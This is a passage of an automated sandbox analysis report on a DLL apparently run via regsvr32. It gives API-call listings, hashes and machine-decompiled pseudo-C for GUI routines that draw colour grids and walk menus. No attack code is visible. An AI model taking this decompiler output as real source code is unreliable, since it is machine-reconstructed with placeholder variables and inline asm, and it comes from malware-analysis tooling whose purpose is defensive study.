                                                                                                                0x1000b18f
                                                                                                                0x1000b195
                                                                                                                0x1000b198
                                                                                                                0x1000b31f
                                                                                                                0x1000b321
                                                                                                                0x1000b177
                                                                                                                0x1000b17a
                                                                                                                0x1000b183
                                                                                                                0x00000000
                                                                                                                0x1000b183
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b0ee
                                                                                                                0x1000b0f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b0f1
                                                                                                                0x1000b0ec
                                                                                                                0x1000b0e3
                                                                                                                0x1000b0da
                                                                                                                0x1000b0d1
                                                                                                                0x1000b0c9
                                                                                                                0x1000b0c6
                                                                                                                0x1000b327

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B0B0
                                                                                                                • OleDuplicateData.OLE32(?,?,00000000), ref: 1000B12F
                                                                                                                • GlobalLock.KERNEL32 ref: 1000B15E
                                                                                                                • CopyMetaFileA.GDI32(?,00000000), ref: 1000B16A
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000B17A
                                                                                                                • GlobalFree.KERNEL32(?), ref: 1000B183
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000B18F
                                                                                                                  • Part of subcall function 1000B053: __EH_prolog3.LIBCMT ref: 1000B05A
                                                                                                                • lstrlenW.KERNEL32(?,0000005C), ref: 1000B1EF
                                                                                                                • CopyFileA.KERNEL32 ref: 1000B2E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMetalstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3994854817-0
                                                                                                                • Opcode ID: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
                                                                                                                • Instruction ID: d9942445a5f91e600a185d9f565c7297f21d3a8cdeceab250ee44f312beabf7e
                                                                                                                • Opcode Fuzzy Hash: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
                                                                                                                • Instruction Fuzzy Hash: DB818CB5900A06AFEB20CFA4CD8896EBBF9FF453847618519F46AD7658D730EC11CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10001073(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t120;
                                                                                                                				intOrPtr _t123;
                                                                                                                				signed int _t125;
                                                                                                                				long _t127;
                                                                                                                				intOrPtr _t140;
                                                                                                                				void* _t154;
                                                                                                                				void* _t158;
                                                                                                                				void* _t159;
                                                                                                                				signed int _t163;
                                                                                                                				int _t164;
                                                                                                                				intOrPtr _t171;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t185;
                                                                                                                				short _t187;
                                                                                                                				void* _t188;
                                                                                                                				intOrPtr _t192;
                                                                                                                				RECT* _t193;
                                                                                                                				void* _t195;
                                                                                                                				signed int _t197;
                                                                                                                				void* _t199;
                                                                                                                				signed long long* _t200;
                                                                                                                				void* _t202;
                                                                                                                				void* _t209;
                                                                                                                				signed long long _t211;
                                                                                                                
                                                                                                                				_t209 = __fp0;
                                                                                                                				_t202 = __eflags;
                                                                                                                				_t200 = _t199 - 0x74;
                                                                                                                				_t197 = _t200 - 4;
                                                                                                                				_t105 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t197 + 0x74) = _t105 ^ _t197;
                                                                                                                				_push(0x70);
                                                                                                                				E1004764D(0x1008dca6, __ebx, __edi, __esi);
                                                                                                                				_t158 = __ecx;
                                                                                                                				_push(__ecx);
                                                                                                                				L1000CE8D(__ecx, _t197 + 0x20, __edi, __esi, _t202);
                                                                                                                				 *(_t197 - 4) = 0;
                                                                                                                				GetClientRect( *(_t158 + 0x20), _t197 - 0x54);
                                                                                                                				_push(GetSysColor(0xf));
                                                                                                                				E1000D544(_t158, _t197 - 0x28, __edi, 0, _t202);
                                                                                                                				 *(_t197 - 4) = 1;
                                                                                                                				FrameRect( *(_t197 + 0x24), _t197 - 0x54,  *(_t197 - 0x24));
                                                                                                                				asm("cdq");
                                                                                                                				_t163 = 0x18;
                                                                                                                				_t185 = 0x18;
                                                                                                                				 *((intOrPtr*)(_t197 - 0x18)) = 0x7fff;
                                                                                                                				 *_t197 = 0;
                                                                                                                				 *((intOrPtr*)(_t197 + 0x14)) = 0;
                                                                                                                				_t164 = ( *((intOrPtr*)(_t197 - 0x4c)) -  *(_t197 - 0x54)) / _t163;
                                                                                                                				_t120 =  *((intOrPtr*)(_t197 - 0x48)) -  *((intOrPtr*)(_t197 - 0x50));
                                                                                                                				 *(_t197 - 0x44) = _t164;
                                                                                                                				asm("cdq");
                                                                                                                				_t183 = _t120 % _t185;
                                                                                                                				 *(_t197 - 0x10) = _t120 / _t185;
                                                                                                                				_t123 = 1;
                                                                                                                				 *((intOrPtr*)(_t197 - 0x64)) = 1;
                                                                                                                				 *((intOrPtr*)(_t197 - 0x5c)) = _t164 + 1;
                                                                                                                				 *((intOrPtr*)(_t197 + 0x10)) = 1;
                                                                                                                				while(1) {
                                                                                                                					asm("fild dword [ebp]");
                                                                                                                					 *((intOrPtr*)(_t197 - 0x60)) = _t123;
                                                                                                                					 *((intOrPtr*)(_t197 - 0x58)) = _t123 +  *(_t197 - 0x10);
                                                                                                                					_t211 = (_t209 +  *0x10099e70) *  *0x10099e60;
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_t125 = E10048990(_t123 +  *(_t197 - 0x10), _t211);
                                                                                                                					_t192 =  *((intOrPtr*)(_t197 + 0x14));
                                                                                                                					 *(_t197 - 0x14) = _t125;
                                                                                                                					asm("fild dword [ebp-0x14]");
                                                                                                                					 *(_t197 - 0x6c) = _t211;
                                                                                                                					 *(_t197 + 0x1c) =  *(_t197 + 0x1c) & 0x00000000;
                                                                                                                					 *(_t197 - 0x2c) = _t125 * _t125;
                                                                                                                					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
                                                                                                                					do {
                                                                                                                						_t187 =  *(_t158 + 0x74);
                                                                                                                						_t127 = ColorHLSToRGB( *(_t197 + 0x1c), _t187,  *(_t197 - 0x14));
                                                                                                                						 *(_t192 +  *((intOrPtr*)(_t158 + 0x58))) = _t127;
                                                                                                                						 *(_t197 - 0x38) = _t127;
                                                                                                                						E1001FBA9(_t197 + 0x20, _t197 - 0x7c, _t127);
                                                                                                                						ColorRGBToHLS( *(_t158 + 0x70), _t197 + 0xc, _t197 + 8, _t197 + 0x18);
                                                                                                                						 *(_t197 + 4) = ( *(_t197 + 0xc) & 0x0000ffff) -  *(_t197 + 0x1c);
                                                                                                                						 *((intOrPtr*)(_t197 - 0x1c)) = ( *(_t197 + 8) & 0x0000ffff) - _t187;
                                                                                                                						asm("fild dword [ebp-0x1c]");
                                                                                                                						 *(_t197 - 0x20) = _t211;
                                                                                                                						_t171 = ( *(_t197 + 0x18) & 0x0000ffff) * ( *(_t197 + 0x18) & 0x0000ffff) +  *(_t197 - 0x2c);
                                                                                                                						 *((intOrPtr*)(_t197 - 0x30)) = _t171;
                                                                                                                						asm("fild dword [ebp-0x30]");
                                                                                                                						_push(_t171);
                                                                                                                						 *(_t197 - 0x34) = _t211;
                                                                                                                						asm("fild dword [ebp+0x4]");
                                                                                                                						 *_t200 = _t211 *  *0x10099e50;
                                                                                                                						E100487D0(_t183, _t171);
                                                                                                                						 *(_t197 + 4) =  *(_t197 + 0x18) & 0x0000ffff;
                                                                                                                						asm("fild dword [ebp+0x4]");
                                                                                                                						asm("fmulp st1, st0");
                                                                                                                						asm("fsubr qword [ebp-0x34]");
                                                                                                                						_t211 =  *(_t197 - 0x20) *  *(_t197 - 0x20);
                                                                                                                						asm("faddp st1, st0");
                                                                                                                						_t140 = E10048990( *(_t197 + 0x18) & 0x0000ffff, _t211);
                                                                                                                						if(_t140 <  *((intOrPtr*)(_t197 - 0x18))) {
                                                                                                                							_t187 = _t158 + 0x60;
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							 *((intOrPtr*)(_t197 - 0x18)) = _t140;
                                                                                                                							asm("movsd");
                                                                                                                							_t192 =  *((intOrPtr*)(_t197 + 0x14));
                                                                                                                							 *(_t158 + 0x5c) =  *(_t197 - 0x38);
                                                                                                                						}
                                                                                                                						OffsetRect(_t197 - 0x7c,  *(_t197 - 0x44), 0);
                                                                                                                						 *(_t197 + 0x1c) =  *(_t197 + 0x1c) + 0xa;
                                                                                                                						_t192 = _t192 + 4;
                                                                                                                						 *((intOrPtr*)(_t197 + 0x14)) = _t192;
                                                                                                                					} while ( *(_t197 + 0x1c) < 0xf0);
                                                                                                                					 *_t197 =  *_t197 + 1;
                                                                                                                					 *((intOrPtr*)(_t197 + 0x10)) =  *((intOrPtr*)(_t197 + 0x10)) +  *(_t197 - 0x10);
                                                                                                                					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
                                                                                                                					if(_t192 < 0x900) {
                                                                                                                						_t123 =  *((intOrPtr*)(_t197 + 0x10));
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t193 = _t158 + 0x60;
                                                                                                                					InflateRect(_t193, 1, 1);
                                                                                                                					_push(((0 |  *(_t158 + 0x74) - 0x000000d2 <= 0x00000000) - 0x00000001 & 0xff64c8c9) + 0xffffff);
                                                                                                                					E1000D544(_t158, _t197 - 0x40, _t187, _t193,  *(_t158 + 0x74) - 0xd2);
                                                                                                                					FrameRect( *(_t197 + 0x24), _t193,  *(_t197 - 0x3c));
                                                                                                                					 *((intOrPtr*)(_t197 - 0x40)) = 0x10098308;
                                                                                                                					L1000CFF6(_t197 - 0x40);
                                                                                                                					 *(_t197 - 4) = 0;
                                                                                                                					 *((intOrPtr*)(_t197 - 0x28)) = 0x10098308;
                                                                                                                					L1000CFF6(_t197 - 0x28);
                                                                                                                					 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
                                                                                                                					_t154 = L1000CEE1(_t158, _t197 + 0x20, _t187, 0x10098308,  *(_t158 + 0x74) - 0xd2);
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
                                                                                                                					_pop(_t188);
                                                                                                                					_pop(_t195);
                                                                                                                					_pop(_t159);
                                                                                                                					return E1004763E(_t154, _t159,  *(_t197 + 0x74) ^ _t197, _t183, _t188, _t195);
                                                                                                                				}
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100096CC
                                                                                                                  • Part of subcall function 1000CE8D: __EH_prolog3.LIBCMT ref: 1000CE94
                                                                                                                  • Part of subcall function 1000CE8D: BeginPaint.USER32(?,?), ref: 1000CEC0
                                                                                                                • GetClientRect.USER32 ref: 100096E8
                                                                                                                • GetSysColor.USER32 ref: 100096F0
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • FrameRect.USER32 ref: 1000970D
                                                                                                                • ColorHLSToRGB.SHLWAPI(00000000,?,?), ref: 1000979E
                                                                                                                  • Part of subcall function 1001FBA9: SetBkColor.GDI32(?,00000000), ref: 1001FBCA
                                                                                                                  • Part of subcall function 1001FBA9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 1001FBDE
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,00007FFF), ref: 100097C9
                                                                                                                • OffsetRect.USER32 ref: 10009857
                                                                                                                • InflateRect.USER32 ref: 10009894
                                                                                                                • FrameRect.USER32 ref: 100098C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Color$H_prolog3$Frame$BeginBrushClientCreateInflateOffsetPaintSolidText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1932886356-0
                                                                                                                • Opcode ID: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
                                                                                                                • Instruction ID: 22ac6c9c8fa047b02607a05c21a63767090b59be9aa7f4c1786ea2e733ae0667
                                                                                                                • Opcode Fuzzy Hash: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
                                                                                                                • Instruction Fuzzy Hash: A6813572D00219EFDF04DFA4C985AEEBBB5FF08310F11412AF816AA251DB75AA15CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003603A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                                				intOrPtr* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				int _v16;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				signed int _v40;
                                                                                                                				int _v44;
                                                                                                                				char _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t52;
                                                                                                                				intOrPtr* _t53;
                                                                                                                				struct HMENU__* _t57;
                                                                                                                				int _t58;
                                                                                                                				int _t59;
                                                                                                                				struct HMENU__* _t60;
                                                                                                                				int _t62;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				int _t67;
                                                                                                                				struct HMENU__* _t68;
                                                                                                                				int _t70;
                                                                                                                				intOrPtr* _t74;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				int _t76;
                                                                                                                				int _t77;
                                                                                                                				struct HMENU__* _t87;
                                                                                                                				intOrPtr _t89;
                                                                                                                
                                                                                                                				_t78 = __ecx;
                                                                                                                				_t75 = __ecx;
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t52 = E10021CE5( *((intOrPtr*)(__ecx + 0x20)));
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_t53 = __ecx + 0x80;
                                                                                                                					_t89 = _a4;
                                                                                                                					if( *_t53 == 0) {
                                                                                                                						L3:
                                                                                                                						_t94 = _t89;
                                                                                                                						if(_t89 == 0) {
                                                                                                                							E1000A069(_t75, _t78, 0, _t89, _t94);
                                                                                                                						}
                                                                                                                						E10010B4E( &_v48);
                                                                                                                						_v36 = _t89;
                                                                                                                						if( *((intOrPtr*)(E1001DD4F(_t75, 0, _t89, _t94) + 0x78)) !=  *(_t89 + 4)) {
                                                                                                                							_t57 = GetMenu( *(_t75 + 0x20));
                                                                                                                							__eflags = _t57;
                                                                                                                							if(_t57 == 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							_t82 = _t75;
                                                                                                                							_t68 = E10015912(_t75, _t75, GetMenu);
                                                                                                                							__eflags = _t68;
                                                                                                                							if(_t68 == 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							_t87 = GetMenu( *(_t68 + 0x20));
                                                                                                                							__eflags = _t87;
                                                                                                                							if(_t87 == 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							_t70 = GetMenuItemCount(_t87);
                                                                                                                							_t77 = 0;
                                                                                                                							__eflags = _t70;
                                                                                                                							_a12 = _t70;
                                                                                                                							if(_t70 <= 0) {
                                                                                                                								L15:
                                                                                                                								_t75 = _v8;
                                                                                                                								goto L16;
                                                                                                                							} else {
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							while(1) {
                                                                                                                								L11:
                                                                                                                								__eflags = GetSubMenu(_t87, _t77) -  *(_t89 + 4);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t77 = _t77 + 1;
                                                                                                                								__eflags = _t77 - _a12;
                                                                                                                								if(_t77 < _a12) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							_push(_t87);
                                                                                                                							_v12 = E1001E527(_t77, _t82, _t87, _t89, __eflags);
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							_v12 = _t89;
                                                                                                                							L16:
                                                                                                                							_t58 = GetMenuItemCount( *(_t89 + 4));
                                                                                                                							_v40 = _v40 & 0x00000000;
                                                                                                                							_v16 = _t58;
                                                                                                                							if(_t58 <= 0) {
                                                                                                                								L36:
                                                                                                                								return _t58;
                                                                                                                							}
                                                                                                                							do {
                                                                                                                								_t59 = GetMenuItemID( *(_t89 + 4), _v40);
                                                                                                                								_v44 = _t59;
                                                                                                                								if(_t59 == 0) {
                                                                                                                									goto L35;
                                                                                                                								}
                                                                                                                								if(_t59 != 0xffffffff) {
                                                                                                                									_v32 = _v32 & 0x00000000;
                                                                                                                									__eflags =  *(_t75 + 0x54);
                                                                                                                									if( *(_t75 + 0x54) == 0) {
                                                                                                                										L27:
                                                                                                                										_t60 = 0;
                                                                                                                										__eflags = 0;
                                                                                                                										L28:
                                                                                                                										_push(_t60);
                                                                                                                										L29:
                                                                                                                										_push(_t75);
                                                                                                                										E10010B74( &_v48);
                                                                                                                										_t62 = GetMenuItemCount( *(_t89 + 4));
                                                                                                                										_t76 = _t62;
                                                                                                                										if(_t76 >= _v16) {
                                                                                                                											L34:
                                                                                                                											_v16 = _t76;
                                                                                                                											_t75 = _v8;
                                                                                                                											goto L35;
                                                                                                                										}
                                                                                                                										_v40 = _v40 + _t62 - _v16;
                                                                                                                										while(_v40 < _t76) {
                                                                                                                											_t64 = GetMenuItemID( *(_t89 + 4), _v40);
                                                                                                                											__eflags = _t64 - _v44;
                                                                                                                											if(_t64 != _v44) {
                                                                                                                												goto L34;
                                                                                                                											}
                                                                                                                											_t43 =  &_v40;
                                                                                                                											 *_t43 = _v40 + 1;
                                                                                                                											__eflags =  *_t43;
                                                                                                                										}
                                                                                                                										goto L34;
                                                                                                                									}
                                                                                                                									__eflags = _t59 - 0xf000;
                                                                                                                									if(_t59 >= 0xf000) {
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									_t60 = 1;
                                                                                                                									goto L28;
                                                                                                                								}
                                                                                                                								_t66 = E1001276D(_t89, _v40);
                                                                                                                								_v32 = _t66;
                                                                                                                								if(_t66 == 0) {
                                                                                                                									goto L35;
                                                                                                                								}
                                                                                                                								_t67 = GetMenuItemID( *(_t66 + 4), 0);
                                                                                                                								_v44 = _t67;
                                                                                                                								if(_t67 != 0 && _t67 != 0xffffffff) {
                                                                                                                									_push(0);
                                                                                                                									goto L29;
                                                                                                                								}
                                                                                                                								L35:
                                                                                                                								_v40 = _v40 + 1;
                                                                                                                								_t58 = _v40;
                                                                                                                							} while (_t58 < _v16);
                                                                                                                							goto L36;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t74 =  *_t53;
                                                                                                                					_t78 = _t74;
                                                                                                                					_t58 =  *((intOrPtr*)( *_t74 + 0x74))(_t89, _a8, 0);
                                                                                                                					if(_t58 != 0) {
                                                                                                                						goto L36;
                                                                                                                					}
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return _t52;
                                                                                                                			}

































                                                                                                                0x00000000
                                                                                                                0x10036118
                                                                                                                0x1003609d
                                                                                                                0x10036068
                                                                                                                0x10036070
                                                                                                                0x10036073
                                                                                                                0x10036078
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036078
                                                                                                                0x100361c0

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021CE5: GetFocus.USER32 ref: 10021CE6
                                                                                                                  • Part of subcall function 10021CE5: GetParent.USER32(00000000), ref: 10021D0F
                                                                                                                  • Part of subcall function 10021CE5: GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
                                                                                                                  • Part of subcall function 10021CE5: GetParent.USER32(?), ref: 10021D38
                                                                                                                  • Part of subcall function 10021CE5: GetDesktopWindow.USER32 ref: 10021D3C
                                                                                                                  • Part of subcall function 10021CE5: SendMessageA.USER32 ref: 10021D50
                                                                                                                • GetMenu.USER32 ref: 100360AD
                                                                                                                • GetMenu.USER32 ref: 100360C1
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 100360CA
                                                                                                                • GetSubMenu.USER32 ref: 100360DB
                                                                                                                • GetMenuItemCount.USER32(?), ref: 100360FD
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 1003611E
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 10036146
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1003617D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 10036198
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 4186786570-0
                                                                                                                • Opcode ID: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
                                                                                                                • Instruction ID: 46843a0fe4c7dd88824f739b3fce7bef7ece51828467e3b86497c45affe004c6
                                                                                                                • Opcode Fuzzy Hash: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
                                                                                                                • Instruction Fuzzy Hash: 3E516A35900209DFDB12DFA4CD85A9EBBF5FF4C382F258565E816AA162DB31ED40DB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10042CE7(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				short _t42;
                                                                                                                				signed int _t49;
                                                                                                                				struct HWND__* _t60;
                                                                                                                				intOrPtr _t63;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t68;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				intOrPtr _t83;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				void* _t90;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				_t89 = __ecx;
                                                                                                                				_t42 = GetKeyState(1);
                                                                                                                				_t91 = _t42;
                                                                                                                				if(_t42 < 0) {
                                                                                                                					return _t42;
                                                                                                                				}
                                                                                                                				_t85 = E1001E375(_t72, _t76, _t84, _t89, _t91);
                                                                                                                				_v12 = _t85;
                                                                                                                				GetCursorPos( &_v20);
                                                                                                                				ScreenToClient( *(_t89 + 0x20),  &_v20);
                                                                                                                				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
                                                                                                                				_v8 = _t49;
                                                                                                                				if(_t49 < 0) {
                                                                                                                					_t16 = _t85 + 0x4c;
                                                                                                                					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                                                                                                                					__eflags =  *_t16;
                                                                                                                					L18:
                                                                                                                					if(_v8 < 0) {
                                                                                                                						L27:
                                                                                                                						if( *(_v12 + 0x4c) == 0xffffffff) {
                                                                                                                							KillTimer( *(_t89 + 0x20), 0xe001);
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
                                                                                                                						L30:
                                                                                                                						_t53 = 0xe000;
                                                                                                                						if(_a4 == 0xe000) {
                                                                                                                							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                                                                                                                							if(_v8 >= 0) {
                                                                                                                								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return _t53;
                                                                                                                					}
                                                                                                                					ClientToScreen( *(_t89 + 0x20),  &_v20);
                                                                                                                					_push(_v20.y);
                                                                                                                					_t87 = WindowFromPoint(_v20);
                                                                                                                					if(_t87 == 0) {
                                                                                                                						L25:
                                                                                                                						_t59 = _v12;
                                                                                                                						_v8 = _v8 | 0xffffffff;
                                                                                                                						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                                                                                                                						L26:
                                                                                                                						if(_v8 >= 0) {
                                                                                                                							goto L30;
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					_t60 =  *(_t89 + 0x20);
                                                                                                                					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                                                                						goto L26;
                                                                                                                					} else {
                                                                                                                						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                                                                						if(_t63 != 0) {
                                                                                                                							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                                                                                                                						}
                                                                                                                						if(_t63 == _t87) {
                                                                                                                							goto L26;
                                                                                                                						} else {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t64 = E10015912(_t72, _t89, _t85);
                                                                                                                				_t81 = _t89;
                                                                                                                				_t75 = _t64;
                                                                                                                				if(E10016A68(_t75, _t89, _t85) == 0) {
                                                                                                                					L6:
                                                                                                                					_v8 = _v8 | 0xffffffff;
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					_t94 = _t75;
                                                                                                                					if(_t75 == 0) {
                                                                                                                						E1000A069(_t75, _t81, _t85, _t89, _t94);
                                                                                                                					}
                                                                                                                					_t81 = _t75;
                                                                                                                					if(E1001795E(_t75) != 0) {
                                                                                                                						L7:
                                                                                                                						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                                                                						if(_t66 != 0) {
